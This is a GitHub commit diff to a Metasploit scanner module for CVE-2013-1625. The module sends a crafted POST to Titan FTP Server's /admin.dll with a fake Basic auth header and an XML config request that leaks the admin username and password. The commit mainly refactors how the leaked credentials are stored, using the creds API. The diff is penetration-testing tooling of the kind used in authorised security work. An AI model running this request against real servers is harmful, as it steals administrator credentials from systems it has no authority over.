Skip to content

Commit 3ffe006

Browse files
void-invoid-in
committed
Update titan_ftp_admin_pwd to use the new creds API
1 parent 9fa4234 commit 3ffe006

File tree

1 file changed

+35
-11
lines changed

1 file changed

+35
-11
lines changed

modules/auxiliary/scanner/http/titan_ftp_admin_pwd.rb

Lines changed: 35 additions & 11 deletions
Original file line numberDiff line numberDiff line change
@@ -33,7 +33,7 @@ def initialize
3333
'License' => MSF_LICENSE,
3434
'References' =>
3535
[
36-
[ 'CVE', '2013-1625' ],
36+
[ 'CVE', '2013-1625' ]
3737
]
3838
)
3939

@@ -44,14 +44,14 @@ def initialize
4444
def run_host(ip)
4545
res = send_request_cgi(
4646
{
47-
'uri' => "/admin.dll",
47+
'uri' => '/admin.dll',
4848
'method' => 'POST',
4949
'headers' => {
5050
'SRT-WantXMLResponses' => 'true',
5151
'SRT-XMLRequest' => 'true',
5252
'Authorization' => 'Basic FAKEFAKE'
5353
},
54-
'data' => "<SRRequest><SRTarget>DOM</SRTarget><SRAction>GCFG</SRAction><SRServerName/><SRPayload></SRPayload></SRRequest>",
54+
'data' => '<SRRequest><SRTarget>DOM</SRTarget><SRAction>GCFG</SRAction><SRServerName/><SRPayload></SRPayload></SRRequest>'
5555
})
5656
return if not res
5757

@@ -89,15 +89,39 @@ def run_host(ip)
8989
print_good("#{ip}:#{datastore['RPORT']} - Base Directory: #{info[:basedir]}")
9090
end
9191
print_good("#{ip}:#{datastore['RPORT']} - Admin Credentials: '#{info[:username]}:#{info[:password]}'")
92-
report_auth_info(
93-
:host => ip,
94-
:port => datastore['RPORT'],
95-
:user => info[:username],
96-
:pass => info[:password],
97-
:ptype => "password",
98-
:proto => "http",
99-
:sname => "Titan FTP Admin Console"
92+
report_cred(
93+
ip: ip,
94+
port: datastore['RPORT'],
95+
user: info[:username],
96+
password: info[:password],
97+
service_name: 'ftp'
10098
)
10199
end
102100
end
101+
102+
def report_cred(opts)
103+
service_data = {
104+
address: opts[:ip],
105+
port: opts[:port],
106+
service_name: opts[:service_name],
107+
protocol: 'tcp',
108+
workspace_id: myworkspace_id
109+
}
110+
111+
credential_data = {
112+
origin_type: :service,
113+
module_fullname: fullname,
114+
username: opts[:user],
115+
private_data: opts[:password],
116+
private_type: :password
117+
}.merge(service_data)
118+
119+
login_data = {
120+
core: create_credential(credential_data),
121+
status: Metasploit::Model::Login::Status::UNTRIED,
122+
}.merge(service_data)
123+
124+
create_credential_login(login_data)
125+
end
126+
103127
end

0 commit comments

Comments
 (0)